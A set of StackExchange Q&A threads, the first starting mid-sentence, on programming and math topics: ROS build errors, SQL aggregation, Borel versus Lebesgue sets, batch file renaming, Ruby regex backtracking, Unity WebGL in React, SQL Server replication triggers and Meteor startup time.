there is no search parameter, the ViewBag will be set to false and your partials will not be rendered; they will be rendered once the search parameter has a value.
lz4 includes not found When building on Mac Sierra, I got an error, and then used this command to reproduce. By the way, excellent logging and tools for trying to narrow down the problem! Anyway, here's the command: cd /Users/pitosalas/ros_catkin_ws/build_isolated/roslz4 && /Users/pitosalas/ros_catkin_ws/install_isolated/env.sh cmake /Users/pitosalas/ros_catkin_ws/src/ros_comm/roslz4 -DCATKIN_DEVEL_PREFIX=/Users/pitosalas/ros_catkin_ws/devel_isolated/roslz4 -DCMAKE_INSTALL_PREFIX=/Users/pitosalas/ros_catkin_ws/install_isolated -DCMAKE_BUILD_TYPE=Release -G 'Unix Makefiles' This command gives the following error in trying to build roslz4 and I can't find any info on where to look to fix it. -- Using CATKIN_DEVEL_PREFIX: /Users/pitosalas/ros_catkin_ws/devel_isolated/roslz4 -- Using CMAKE_PREFIX_PATH: /Users/pitosalas/ros_catkin_ws/install_isolated -- This workspace overlays: /Users/pitosalas/ros_catkin_ws/install_isolated -- Using PYTHON_EXECUTABLE: /usr/local/opt/python/libexec/bin/python -- Using default Python package layout -- Using empy: /usr/local/lib/python2.7/site-packages/em.pyc -- Using CATKIN_ENABLE_TESTING: ON -- Call enable_testing() -- Using CATKIN_TEST_RESULTS_DIR: /Users/pitosalas/ros_catkin_ws/build_isolated/roslz4/test_results -- Found gtest: gtests will be built -- Using Python nosetests: /usr/local/bin/nosetests-2.7 -- catkin 0.7.6 CMake Error at CMakeLists.txt:13 (message): lz4 includes not found -- Configuring incomplete, errors occurred! See also "/Users/pitosalas/ros_catkin_ws/build_isolated/roslz4/CMakeFiles/CMakeOutput.log". Originally posted by pitosalas on ROS Answers with karma: 628 on 2017-07-21 Post score: 0 This is part of the many problems in getting ROS up on Mac. You can read my summary of this experience in another question. Bottom line, I abandoned trying to install it on Mac, there are just too many loose ends. I am having far better success with running ROS under VMWare with Ubuntu. 
Originally posted by pitosalas with karma: 628 on 2017-07-30 Post score: 0
Summarize data in one row selecting MAX or MIN date I have a set of data from multiple tables on SQL Server. They include transactions on different dates that are related to customers. I want to create a SQL Server view that has one line per customer. For the date, I want to use the latest or earliest date. The date is in numeric format, so I thought I could use MAX or MIN to create the view, but I am not sure what I am doing wrong, since it is not working. In short, I want to have the total of AMOUNT_TR, and for the date I want one of the dates; in the case of the above example, 20160608 or 20140228. How do you identify the customer? Assuming customer_id is your customer column, you can create a subquery that contains the max() date and customer_id, then join it to your main table to use the other columns. select t1.* from tableA t1 inner join (select customer_id, max(date_tr) date_tr from tableA group by customer_id) t2 on t2.customer_id = t1.customer_id and t1.date_tr = t2.date_tr Is this what you want? select customer, sum(amount_tr), min(date_tr), max(date_tr) from t group by customer;
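A quick way to sanity-check the GROUP BY approach from the last answer is to run it against a tiny in-memory table. The sketch below uses Python's built-in sqlite3 module; the table and column names mirror the question but the data is made up:

```python
import sqlite3

# In-memory table mirroring the question's columns; the schema and
# sample rows here are assumptions, not the asker's real data.
con = sqlite3.connect(":memory:")
con.execute("CREATE TABLE t (customer TEXT, amount_tr REAL, date_tr INTEGER)")
con.executemany(
    "INSERT INTO t VALUES (?, ?, ?)",
    [("A", 10.0, 20140228), ("A", 5.0, 20160608), ("B", 7.5, 20150101)],
)

# One row per customer: total amount plus the earliest and latest
# numeric dates - exactly what SUM/MIN/MAX with GROUP BY produce.
rows = con.execute(
    """SELECT customer, SUM(amount_tr), MIN(date_tr), MAX(date_tr)
       FROM t GROUP BY customer ORDER BY customer"""
).fetchall()
print(rows)  # [('A', 15.0, 20140228, 20160608), ('B', 7.5, 20150101, 20150101)]
```

Because the dates are stored as YYYYMMDD integers, numeric MIN/MAX order them the same way chronological order would, which is why the aggregate approach works here.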
Cardinality argument in proving that not every Lebesgue measurable set is a Borel set Hello, I need help understanding a proof. The proof is from Rudin's Real and Complex Analysis. The proof is supposed to address the question: Is every Lebesgue measurable set a Borel set? Let $c$ be the cardinality of the continuum (the real line or, equivalently, the collection of all sets of integers). We know that $\mathbb R^k$ has a countable base (open balls with rational radii and with centers in some countable dense subset of $\mathbb R^k$) and that $\mathcal B_k$ (the collection of all Borel sets of $\mathbb R^k$) is the $\sigma$-algebra generated by this base. It follows from this that $\mathcal B_k$ has cardinality $c$. On the other hand, there exist Cantor sets $E\subset\mathbb R^1$ with $m(E)=0$ (where $m$ is Lebesgue measure). The completeness of $m$ implies that each of the $2^c$ subsets of $E$ is Lebesgue measurable. Since $2^c>c$, most subsets of $E$ are not Borel sets. I do not understand why the $2^c$ is needed. Neither do I understand how it is so suddenly introduced. Where does the $2^c$ come from? Also, how does the fact that $2^c>c$ show that most subsets of $E$ are not Borel sets? What is the relation between cardinality and Borel sets? A Cantor set has cardinality $c$. So its power set, the set of all its subsets, has cardinality $2^c$. But Rudin just showed the set of Borel sets has cardinality $c$. I need help understanding your question. You said: "I do not understand why the $2^c$ is needed." I guess that means you think it can be proved without $2^c$? So why don't you show us how you would prove without $2^c$ that there are measurable sets which are not Borel sets? ". . . it is so suddenly introduced. Where does the $2^c$ come from?" Yes, Rudin's explanation, "The completeness of $m$ implies that each of the $2^c$ subsets of $E$ is Lebesgue measurable," is a bit terse.
A verbose paraphrase: "The completeness of $m$ implies that each subset of $E$ is Lebesgue measurable. How many sets is that? Well, the set $E$ has $c$ elements, so it has $2^c$ subsets." On the one hand he’s shown that $\Bbb R^k$ has $\mathfrak{c}$ Borel sets. On the other hand, there is a Cantor set $E\subseteq\Bbb R^1$ such that $m(E)=0$. Since $m$ is complete, this implies that every subset of $E$ is Lebesgue measurable with measure $0$. Since $|E|=\mathfrak{c}$, $E$ has $2^{\mathfrak{c}}$ subsets, so we know that $\Bbb R^k$ has $2^\mathfrak{c}$ Lebesgue measurable subsets. However, it has only $\mathfrak{c}$ Borel subsets, and $\mathfrak{c}<2^{\mathfrak{c}}$. Let $\mathscr{S}_k$ be the family of subsets of $\Bbb R^k$ that are Lebesgue measurable but not Borel. If $|\mathscr{S}_k|$ were less than $2^{\mathfrak{c}}$, the family of Lebesgue measurable subsets of $\Bbb R^k$, being the union of $\mathscr{B}_k$ and $\mathscr{S}_k$, would have cardinality $$|\mathscr{S}_k|+|\mathscr{B}_k|=|\mathscr{S}_k|+\mathfrak{c}=\max\{|\mathscr{S}_k|,\mathfrak{c}\}<2^{\mathfrak{c}}\;,$$ which is false. Thus, we must have $|\mathscr{S}_k|=2^{\mathfrak{c}}$: $\Bbb R^k$ has as many Lebesgue measurable subsets that are not Borel as it has subsets altogether. Since it has only $\mathfrak{c}<2^{\mathfrak{c}}$ Borel subsets, it’s fair to say that most of its Lebesgue measurable subsets are not Borel. More generally, if $\kappa$ is an infinite cardinal, $A$ is a set of cardinality $\kappa$, and $B\subseteq A$ is of cardinality $\lambda<\kappa$, then $|A\setminus B|=\kappa$: throwing away a smaller subset of an infinite set does not reduce the cardinality.
most numbers in $[0,1]$ are irrational; but also most of them lie outside the Cantor set; and even if you have a fat Cantor set of measure $0.9$, in another sense [it is nowhere dense] most numbers still lie outside of it). But one thing seems to be very clear: if $A\subseteq X$ and there is a significant cardinality difference between $A$ and $X\setminus A$, then we can say that most elements lie in the larger set. So if there are only $\frak c$ Borel sets, but $2^\frak c$ Lebesgue measurable sets, then almost all the Lebesgue measurable sets are not Borel sets, since $2^\frak c$ is significantly larger than $\frak c$. Similar reasoning shows that most subsets of $\Bbb R$ are not Borel either. You can ask whether or not "most" subsets of $\Bbb R$ are Lebesgue measurable; since both collections (measurable and non-measurable) are of size $2^\frak c$, this requires finer tools than cardinality, and this is a whole different question.
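The counting running through these answers can be condensed into a single display, in the same notation used above: $$|\mathscr{B}_k|=\mathfrak{c},\qquad |E|=\mathfrak{c}\implies|\mathcal{P}(E)|=2^{\mathfrak{c}},\qquad 2^{\mathfrak{c}}>\mathfrak{c}\quad\text{(Cantor's theorem)}.$$ Since completeness of $m$ places every member of $\mathcal{P}(E)$ among the Lebesgue measurable sets, while only $\mathfrak{c}$-many sets are Borel, there must be $2^{\mathfrak{c}}$-many subsets of $E$ that are Lebesgue measurable but not Borel.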
Rename multiple files in cmd If I have multiple files in a directory and want to append something to their filenames, but not to the extension, how would I do this? I have tried the following, with test files file1.txt and file2.txt: ren *.txt *1.1.txt This renames the files to file1.1.txt and file2.txt1.1.txt I want the files to be file1 1.1.txt and file2 1.1.txt Will this be possible from cmd or do I need to have a bat file to do this? What about PowerShell? Are there a lot of files? There's about 90 in a folder You can also do this with just the UI if you want. Select all the files, rename one to "file" and it will show up as file (1), file (2), file (3), file (4), etc. @Morne, You can also use a tool like Massive File Renamer http://superuser.com/a/730292/78897 for /f "delims=" %%i in ('dir /b /a-d *.txt') do ren "%%~i" "%%~ni 1.1%%~xi" If you use the simple for loop without the /f parameter, already renamed files will be renamed again. What does '~n' in "%%~ni 1.1%%~xi" stand for? I don't understand how it works... Read the for documentation, it explains how variable placeholders work. Make sure that there are more ? than there are characters in the longest name: ren *.txt "???????????????????????????? 1.1.txt" See How does the Windows RENAME command interpret wildcards? for more info. New Solution - 2014/12/01 For those who like regular expressions, there is JREN.BAT - a hybrid JScript/batch command line utility that will run on any version of Windows from XP forward. jren "^.*(?=\.)" "$& 1.1" /fm "*.txt" or jren "^(.*)(\.txt)$" "$1 1.1$2" /i The absolute max file name length is 255 characters. But the practical limit for most scenarios is less, since the max total path length supported by the Windows UI is 259 characters. The total path length includes volume, folder, and file name information, plus a null terminator. See http://msdn.microsoft.com/en-us/library/aa365247.aspx for more info.
Thanks for introducing jren, it was exactly what I needed: simple, short and fast. Btw, with it it's possible to use shorthand character classes like \d or \w. @Armfoot - Yes - JREN uses standard JScript regex, so the shorthand character classes are supported. You can read the Microsoft regex syntax documentation. Step 1: Select all files (Ctrl + A) Step 2: Then choose the rename option Step 3: Choose your filename... for ex: myfile; it automatically renames to myfile (01), myfile (02), ... If you want to replace spaces & brackets, continue with step 4 Step 4: Open Windows PowerShell from your current folder Step 5: To replace empty spaces with an underscore (_) dir | rename-item -NewName {$_.name -replace [Regex]::Escape(" "),"_"} Step 6: To replace the open bracket dir | rename-item -NewName {$_.name -replace [Regex]::Escape("("),""} To replace the close bracket dir | rename-item -NewName {$_.name -replace [Regex]::Escape(")"),""} Credits perhaps to https://www.howtogeek.com/111859/how-to-batch-rename-files-in-windows-4-ways-to-rename-multiple-files ? I did the same thing for renaming all images and videos in a folder. But when the filetype changes, the number starts again from 1. Could you please check this question of mine https://stackoverflow.com/questions/77478281/rename-all-the-items-in-a-folder-without-checking-the-type-of-file-in-windows-os The below command would do the job. forfiles /M *.txt /C "cmd /c rename @file \"@fname 1.1.txt\"" source: Rename file extensions in bulk +1 I think this is the easiest one to remember, much simpler than the for syntax of cmd, but the letdown is that it has to spawn a new cmd.exe process for every iteration. That makes this very inefficient and slow as molasses. Try this Bulk Rename Utility It works well. Maybe not reinvent the wheel. If you don't necessarily need a script, this is a good way to go. Still a good solution if you do not want to
script. @echo off for %%f in (*.txt) do ( ren "%%~nf%%~xf" "%%~nf 1.1%%~xf" ) If that does not run for you (e.g. directly at the command prompt), use single percent signs: for %f in (*.txt) do (ren "%~nf%~xf" "%~nf 1.1%~xf") I found the following in a small comment on Superuser.com: @JacksOnF1re - New information/technique added to my answer. You can actually delete your Copy of prefix using an obscure forward slash technique: ren "Copy of .txt" "////////" From How does the Windows RENAME command interpret wildcards? (see in that thread the answer by dbenham). My problem was slightly different: I wanted to add a prefix to the file and remove from the beginning what I don't need. In my case I had several hundred enumerated files such as: SKMBT_C36019101512510_001.jpg SKMBT_C36019101512510_002.jpg SKMBT_C36019101512510_003.jpg SKMBT_C36019101512510_004.jpg : : Now I wanted to respectively rename them all to (Album 07 picture #): A07_P001.jpg A07_P002.jpg A07_P003.jpg A07_P004.jpg : : I did it with a single command line and it worked like a charm: ren "SKMBT_C36019101512510_*.*" "/////////////////A07_P*.*" Note: Quoting (") the "<Name Scheme>" is not optional; it does not work otherwise. In our example, "SKMBT_C36019101512510_*.*" and "/////////////////A07_P*.*" were quoted. I had to exactly count the number of characters I want to remove and leave space for my new characters: The A07_P actually replaced 2510_ and the SKMBT_C3601910151 was removed, by using exactly the number of slashes ///////////////// (17 characters). I recommend copying your files (making a backup) before applying the above. I tried pasting Endoro's command (Thanks Endoro) directly into the command prompt to add a prefix to files but encountered an error. The solution was to reduce %% to %, so: for /f "delims=" %i in ('dir /b /a-d *.*') do ren "%~i" "Service.Enviro.%~ni%~xi" I was puzzled by this also... didn't like the parentheses that Windows puts in when you rename in bulk. In my research I decided to write a script with PowerShell instead.
Super easy and worked like a charm. Now I can use it whenever I need to batch process file renaming... which is frequent. I take hundreds of photos and the camera names them IMG1234.JPG etc... Here is the script I wrote: # filename: bulk_file_rename.ps1 # by: subcan # PowerShell script to rename multiple files within a folder to a # name that increments without (#) # create counter $int = 1 # ask user for what they want $regex = Read-Host "Regex for files you are looking for? ex. IMG*.JPG " $file_name = Read-Host "What is new file name, without extension? ex. New Image " $extension = Read-Host "What extension do you want? ex. .JPG " # get a total count of the files that meet regex $total = Get-ChildItem -Filter $regex | measure # while loop to rename all files with new name while ($int -le $total.Count) { # display where in loop you are Write-Host "within while loop" $int # create variable for concatenated new name - # $int.ToString("000") ensures 3 digit number 001, 010, etc $new_name = $file_name + $int.ToString("000") + $extension # get the first occurrence and rename Get-ChildItem -Filter $regex | select -First 1 | Rename-Item -NewName $new_name # display renamed file name Write-Host "Renamed to" $new_name # increment counter $int++ } I hope that this is helpful to someone out there. subcan This works for your specific case: ren file?.txt "file? 1.1.txt"
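For readers outside Windows, the same "append before the extension" rename the question asks for can be sketched cross-platform with Python's pathlib (folder, suffix, and pattern below are placeholders, not anything from the original post):

```python
from pathlib import Path

def append_suffix(folder, suffix=" 1.1", pattern="*.txt"):
    """Rename e.g. file1.txt -> 'file1 1.1.txt' for every match in folder."""
    renamed = []
    # sorted() materializes the glob first, so files renamed below are
    # not picked up a second time by the (otherwise lazy) iterator.
    for path in sorted(Path(folder).glob(pattern)):
        target = path.with_name(path.stem + suffix + path.suffix)
        path.rename(target)
        renamed.append(target.name)
    return renamed
```

This mirrors what the cmd one-liners above do: `path.stem` plays the role of `%%~nf` and `path.suffix` the role of `%%~xf`.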
ruby regex hangs I wrote a ruby script to process a large number of documents and use the following regex to extract URIs from a document's string representation: #Taken from: http://daringfireball.net/2010/07/improved_regex_for_matching_urls URI_REGEX = / ( # Capture 1: entire matched URL (?: [a-z][\w-]+: # URL protocol and colon (?: \/{1,3} # 1-3 slashes | # or [a-z0-9%] # Single letter or digit or '%' ) | # or www\d{0,3}[.] # "www.", "www1.", "www2." … "www999." | # or [a-z0-9.\-]+[.][a-z]{2,4}\/ # looks like domain name followed by a slash ) (?: # One or more: [^\s()<>]+ # Run of non-space, non-()<> | # or \(([^\s()<>]+|(\([^\s()<>]+\)))*\) # balanced parens, up to 2 levels )+ (?: # End with: \(([^\s()<>]+|(\([^\s()<>]+\)))*\) # balanced parens, up to 2 levels | # or [^\s`!()\[\]{};:'".,<>?«»“”‘’] # not a space or one of these punct chars ) )/xi It works pretty well for 99.9 percent of all documents but always hangs up my script when it encounters the following token in one of the documents: token = "synsem:local:cat:(subcat:SubMot,adjuncts:Adjs,subj:Subj)," I am using the standard ruby regexp operator: token =~ URI_REGEX and I don't get any exception or error message. First I tried to solve the problem by encapsulating the regex evaluation in a Timeout::timeout block, but this degrades performance too much. Any other ideas on how to solve this problem? Why reinvent the wheel? require 'uri' uri_list = URI.extract("Text containing URIs.") See, that's exactly what I mean. +1 for using the right tool for the job. Your problem is catastrophic backtracking. I just loaded your regex and your test string into RegexBuddy, and it gave up after 1.000.000 iterations of the regex engine (and from the looks of it, it would have gone on for many millions more had it not aborted).
The problem arises because some parts of your text can be matched by different parts of your regex (which is horribly complicated and painful to read); it seems that the "One or more:" part of your regex and the "End with:" part struggle over the match (when it's not working), trying out millions of permutations that all fail. It's difficult to suggest a solution without knowing what the rules for matching a URI are (which I don't). All this balancing of parentheses suggests to me that regexes may not be the right tool for the job. Maybe you could break down the problem. First use a simple regex to find everything that looks remotely like a URI, then validate that in a second step (isn't there a URI parser for Ruby of some sort?). Another thing you might be able to do is to prevent the regex engine from backtracking by using atomic groups. If you can change some (?:...) groups into (?>...) groups, that would allow the regex to fail faster by disallowing backtracking into those groups. However, that might change the match and make it fail on occasions where backtracking is necessary to achieve a match at all - so that's not always an option. URI.extract("Text containing URIs.") is the best solution if you only need the URIs. I finally used pat = URI::Parser.new.make_regexp('http') to get the built-in URI parsing regexp and use it in match = str.match(pat, start_pos) to iteratively parse the input text URI by URI. I am doing this because I also need the URI positions in the text, and the returned match object gives me this information via match.begin(0).
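To make the "use the standard library" suggestion concrete, here is a small sketch (the sample text is made up; the last token is the one from the question). Passing an explicit scheme list to URI.extract means "synsem:..." is not treated as an opaque URI, and no backtracking-prone hand-written regex is involved:

```ruby
require 'uri'

# Made-up sample text; the trailing token is the problem string
# from the question.
text = "See http://example.com/page and https://foo.bar/baz?q=1 as well as " \
       "synsem:local:cat:(subcat:SubMot,adjuncts:Adjs,subj:Subj),"

# Without a scheme list, URI.extract would also pick up "synsem:...",
# because any "scheme:opaque" token parses as a URI.
uris = URI.extract(text, %w[http https])
```

For the position-tracking variant mentioned above, `URI::Parser.new.make_regexp(%w[http https])` yields the same restricted pattern for use with `String#match` and `MatchData#begin`.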
common-pile/stackexchange_filtered
Does randomness help depth? Suppose we have an $RNC^i$ or $BPNC^i$ algorithm for a problem. Is it suspected that the problem has an $NC^i$ algorithm, or just an $NC^j$ algorithm for some $j\geq i$? Is there any evidence for whether randomness does or does not help depth, akin to the evidence for $P=BPP$?
common-pile/stackexchange_filtered
Why is Unity WebGL not working on my React Website? I have been trying to import a Unity game inside of my website using React Unity WebGL. I have looked at many tutorials and videos and I seem to have the right code; however, the games do not show up on my website (images attached of code and website). Does anyone know what I am doing wrong and how I can fix it? [My Game.tsx file which I use in my Game.js file] (https://i.sstatic.net/fWknb.png) [My Game.js file] (https://i.sstatic.net/10dFe.png) Please do not upload images of code/data/errors. Do you get any errors in your developer tools console? @AlexWayne No, I do not get any compile errors or anything. As you can see on the website, it works, but the Unity game does not show up. Any advice will be a godsend as I have been trying to get this to work for weeks. You don't create an instance of the game. You should call the "createUnityInstance" function from the Unity loader script ("Build.loader.js" for your game). To fix this you can use an iframe and load index.html from the Unity build package, or create your own loader.
For example, for the loader, you can use Unity's minimal WebGL template code:

<canvas id="unity-canvas" width=960 height=600 tabindex="-1" style="width: 960px; height: 600px; background: #231F20"></canvas>
<script src="Build/html5.loader.js"></script>
<script>
  if (/iPhone|iPad|iPod|Android/i.test(navigator.userAgent)) {
    // Mobile device style: fill the whole browser client area with the game canvas:
    var meta = document.createElement('meta');
    meta.name = 'viewport';
    meta.content = 'width=device-width, height=device-height, initial-scale=1.0, user-scalable=no, shrink-to-fit=yes';
    document.getElementsByTagName('head')[0].appendChild(meta);

    var canvas = document.querySelector("#unity-canvas");
    canvas.style.width = "100%";
    canvas.style.height = "100%";
    canvas.style.position = "fixed";
    document.body.style.textAlign = "left";
  }

  createUnityInstance(document.querySelector("#unity-canvas"), {
    dataUrl: "Build/html5.data",
    frameworkUrl: "Build/html5.framework.js",
    codeUrl: "Build/html5.wasm",
    streamingAssetsUrl: "StreamingAssets",
    companyName: "Test",
    productName: "test",
    productVersion: "0.1",
    // matchWebGLToCanvasSize: false, // Uncomment this to separately control WebGL canvas render size and DOM element size.
    // devicePixelRatio: 1, // Uncomment this to override low DPI rendering on high DPI displays.
  });
</script>
common-pile/stackexchange_filtered
How can I improve this React component with correct lifecycle usage? I am trying to make a list item toggle on and off. So I capture the click event, send a request to my endpoint with PATCH method, get the new value returned from the backend and update the state of the component based on that value. And it works perfectly. But I have the feeling that I might have to use useEffect here in some way. But I can't figure out how to do it. Any suggestions would be much appreciated.

import { useState } from 'react';
import { useSelector } from 'react-redux';

export function ListItem({ id, content, checked }) {
  const token = useSelector(state => state.auth.token);
  const [isChecked, setIsChecked] = useState(checked);

  const makeRequest = async () => {
    const uri = `http://<IP_ADDRESS>:8000/listitems/${id}/`;
    const h = new Headers();
    h.append('Authorization', `Token ${token}`);
    h.append('Content-Type', 'application/json');
    const req = new Request(uri, {
      method: 'PATCH',
      headers: h,
      body: JSON.stringify({ checked: !isChecked }),
      mode: 'cors'
    })
    const response = await fetch(req);
    const json = await response.json();
    const result = json.checked;
    return result;
  }

  const handleClick = async (e) => {
    // request the endpoint to check/uncheck the item
    const result = await makeRequest();
    // add/remove the strikethrough class to/from the content
    setIsChecked(result);
  }

  return (
    <>
      <label>
        <input onChange={handleClick} type="checkbox" name="list-items" checked={isChecked}/>
        {isChecked ? <s children={content} /> : content}
      </label>
      <br/>
    </>
  );
}

It looks reasonable, though I'd suggest preventing multiple checkbox changes from triggering multiple requests @CertainPerformance May you direct me to a resource where I might read a bit more about how I can achieve that? I'm trying to build a collaborative list, e.g. Google Keep allows multiple users to work on and build a list. So it's important that the database gets updated once someone checks off a list item.
Well you probably want to at least disable the checkbox while the request is in-flight. Not sure if it's even needed or not, actually. If makeRequest takes 10 seconds, are you able to trigger multiple handleClicks before the 10 seconds are up? If not, there's nothing to worry about. If so, fix it by calling e.preventDefault inside the handler, or something similar. @CertainPerformance Is preventDefault() useful for checkbox toggles? I thought they only prevent form submission. Outside React, it'd prevent the click from toggling the checkbox.
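One framework-agnostic way to get the effect discussed above (my own sketch, not from the thread) is to wrap the request in a guard that silently drops calls while a previous one is still in flight; in the component you would also flip a disabled state alongside the flag.

```javascript
// Wrap an async function so overlapping calls are ignored until the
// first one settles (hypothetical helper, not a React API).
function makeSingleFlight(fn) {
  let inFlight = false;
  return async (...args) => {
    if (inFlight) return;        // drop the click while a request is pending
    inFlight = true;
    try {
      return await fn(...args);  // run the real request
    } finally {
      inFlight = false;          // allow the next click once settled
    }
  };
}
```

In the component, `handleClick` would become `makeSingleFlight(async (e) => { ... })`, optionally paired with a `disabled` state on the checkbox so the UI reflects the pending request.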
common-pile/stackexchange_filtered
Transactional replication w/ immediate update - Publisher triggers are firing on immediate update, or not replicating their modifications I have a publisher and multiple subscribers configured for transactional replication with immediate update. I have two replicated tables, MyTable and MyTableHistory. I have a "not for replication" trigger that captures the history of changes to MyTable and places them in the MyTableHistory table. Here is my problem: If I try to place the trigger ONLY on the publisher: When a user updates MyTable on the subscriber, the record is immediately created on the publisher via a distributed transaction and Microsoft's stored procedures and triggers, as intended by the "immediate update" type of replication. This fires the trigger on the publisher, which creates the history record on the publisher as expected. HOWEVER, the history record just created by the trigger is not replicated back out to the subscriber. I'm guessing it's a side effect of them preventing already replicated records from being replicated back to the subscriber that originated them. If I try to place the trigger on BOTH the publisher and subscribers: When a user updates MyTable on the subscriber, the record is immediately created on the publisher, which fires the trigger and results in a duplicate history record. No matter what I've tried, I cannot figure out how to get the trigger to detect that the record is being modified by replication's "immediate update", so that it should abort. I've tried "not for replication" and "sp_check_for_sync_trigger", but I learned that these weren't intended to detect what I'm looking for. I think the first of the two options above is preferred, but at this point, I'm open to any approach that will make one of the two options above work. Any ideas? Thanks! I'm not sure you'll get an answer here, as Updatable Subscriptions for Transactional Replication were deprecated with SQL 2008.
Making you probably now one of the world's foremost experts on them :) The best solution I found was to place the triggers on both publisher and subscribers, and include the following code in the trigger to bail under certain conditions, to keep the trigger from firing during replication maintenance. It requires the following three approaches:

not for replication trigger option - Prevents the subscriber trigger from firing when a record is replicated from the publisher to subscribers

spGetLastCommand - This is a signed stored procedure I created with view server state permission. It returns the last command so we can check if it was the replication stored procedure run on the publisher, which lets us prevent the publisher trigger from firing when the subscriber changes cause an immediate update to the publisher.

sp_check_for_sync_trigger - This code prevents the trigger from firing when an update statement is issued while the replication stored procedures are trying to update the ms_repl_tran column.

Hope that helps someone. But probably not since we're the last ones on the planet using this type of replication ;)

declare @last_command nvarchar(512)
exec master..spGetLastCommand @last_command output
if @last_command like '%sp_MSsync_%_MyTable_1%'
begin
    return
end

declare @table_id int = object_id('MyTable')
declare @trigger_op varchar(max)
declare @retcode int

exec @retcode = sp_check_for_sync_trigger @table_id, @trigger_op output, @fonpublisher=1
if @retcode = 1
begin
    return
end

exec @retcode = sp_check_for_sync_trigger @table_id, @trigger_op output, @fonpublisher=0
if @retcode = 1
begin
    return
end
common-pile/stackexchange_filtered
Science museum planetarium, late afternoon exhibit on cosmic ice formation. Look at this display about ice in space. It says dust grains in molecular clouds get coated with frozen water and other molecules when temperatures drop to 10 Kelvin. That's incredibly cold. But what's interesting is how those ice layers aren't just sitting there doing nothing. When cosmic rays hit them, they trigger chemical reactions that wouldn't happen otherwise. Right, the radiation breaks molecular bonds and creates reactive fragments. So you'd start with simple molecules like water, methane, and ammonia all frozen together on a grain surface. Exactly. And those fragments can recombine in new ways while they're trapped in the solid ice matrix. The cold temperature keeps everything locked in place, but the radiation provides the energy needed for chemistry to happen. That's brilliant - it's like having a natural laboratory where you can force molecules together that would never meet under normal conditions. The ice acts as both a concentrator and a cage. And here's what really gets me - when they recreate these conditions in actual laboratories, bombarding ice mixtures with radiation, they find amino acids forming. The same building blocks that make up proteins in living things. So you're saying that the amino acids found in meteorites might have formed this way? Through radiation chemistry in interstellar ice before our solar system even existed? That's the compelling part. These aren't just random organic compounds - they're specifically the types of molecules that life depends on. It suggests there's a natural pathway from simple ices in space to the complex chemistry that could eventually lead to biology. The process is almost inevitable then. Wherever you have cold dust, simple molecules, and radiation - which is basically everywhere in space - you get this ice chemistry happening. And the implications are huge. 
If amino acid formation is this straightforward in cosmic ices, then the raw materials for life might be distributed throughout the galaxy, just waiting for the right conditions to assemble into something more complex. It makes you wonder how many worlds out there started with the same chemical foundation that we did.
sci-datasets/scilogues
Increase in Memory usage without leak? I have a program that CRTDBG reports as having no leaks, yet, according to Windows Task Manager, takes up more memory as time goes on. Even worse is that given enough time, it will crash with exit code -1. This is a program that's going to be a game engine; right now I'm testing the functions that will unload the level by making it rapidly load and unload levels. This appears to be working, otherwise the entities from the 'last' level would bump into the current ones. The memory doesn't increase when I run the program 'normally' and load one level without unloading until exiting. It may be of note that loading a level involves reading from the hard drive and opening a file. It might also be important to know that I'm using the Chipmunk physics library, Lua, and OpenGL. The thing that's making this the most tricky is how CRTDBG won't dump, and it returns 0 at the end of main(). EDIT: Also, using Visual Studio 2008. Blaming the tool doesn't usually get you anywhere. Prove it: intentionally leak memory and verify that it gets reported. If that checks out, you'll need to analyze your program to figure out why it is holding on to data for too long. Well, I tried sticking a 'new' or a 'malloc' in the beginning of main(). So it may be some sort of auto collect, CRTDBG not working, or I didn't implement it right. To me it sounds like you are not really leaking memory, just allocating a lot of it and then freeing it up at the exit. Perhaps you are holding on to some list of objects that you forget to free/delete between the loading of each level? Lua's garbage collector collects when it feels like it. If you're not explicitly ordering Lua to do a collection, then memory may build up there without being actually used. Forcing the garbage collector at the same frequency as the level loads doesn't stop it. It may be that you're observing the effects of a "smart" allocator that asks the OS for big chunks of memory and suballocates.
You might check by replacing the global operator new and operator delete. If those tell you that all allocated memory is also deallocated, and yet the process' memory consumption goes up or stays up there, then it's (most probably) the allocator.
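A minimal sketch of that check (my own illustration, using simple call counters; a real version would also replace the array forms `operator new[]`/`operator delete[]` and track byte totals): replace the global allocation functions and compare the counters at points of interest.

```cpp
#include <cstdlib>
#include <new>

// Global counters bumped by every replaceable new/delete in the program.
static std::size_t g_news = 0;
static std::size_t g_deletes = 0;

void* operator new(std::size_t size) {
    void* p = std::malloc(size);  // must not call new here, or we'd recurse
    if (!p) throw std::bad_alloc();
    ++g_news;
    return p;
}

void operator delete(void* p) noexcept {
    if (p) {
        ++g_deletes;
        std::free(p);
    }
}
```

If the two counters match at a point where the process' memory consumption is still high, the memory is being held below `new` — by the allocator or by malloc-level allocations — rather than by leaked objects.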
common-pile/stackexchange_filtered
How can I speed up the local server startup time of my Meteor app? I'm contributing visual design changes to a Meteor app and I need to make changes and see them in the browser. Only problem is that the app takes minutes to display on localhost. It reminds me of the time it takes a free herokuapp to wake up, only longer. Any idea what might be making it slow? Is this a problem that is common to Meteor apps? Note: The dev team has profiled the app but there is some hidden wait time not reflected in the profile Normally it's pretty fast - like seconds, not minutes. @MichelFloyd I'm going to take that as a good sign that we have a fixable problem. ...but I guess that makes it hard to guess what the problem is. hmm.... When Meteor rebuilds the app after a change, you'll see a bunch of messages in the console where you started it. Which one(s) seem to take a very long time? I suggest starting to debug by enabling the profiler via export METEOR_PROFILE=1. Speed depends on the packages and scripts you use, so you should figure out where the performance bottleneck is - Meteor itself is normally very fast. If you just change the CSS, I don't think you should expect to have to noticeably wait at all. So you may want to try and focus on big template changes (What are you using? React, Blaze, Angular?) in single steps and then make incremental CSS changes. @Hans you make a good point about CSS changes not being that painful, but I'm also updating strings, etc. Still not that painful. ...but it's mainly that I see the development team having a lot of their time wasted by the server start time. We are using React with a bazillion packages because the app is built on top of an existing app and the feature scope is pretty big. @pixelfairy Almost all web tools I've worked with take their sweet time to restart after a file change and Meteor has never struck me as being on the painful side, so it may be the complexity of your project that is the issue here.
Can you post a list of all the packages you are using (meteor list)? A beginner mistake I made was to test whether demo data was set up and whether data migrations existed every single time the server restarted, which obviously can take its toll as your data increases.
common-pile/stackexchange_filtered
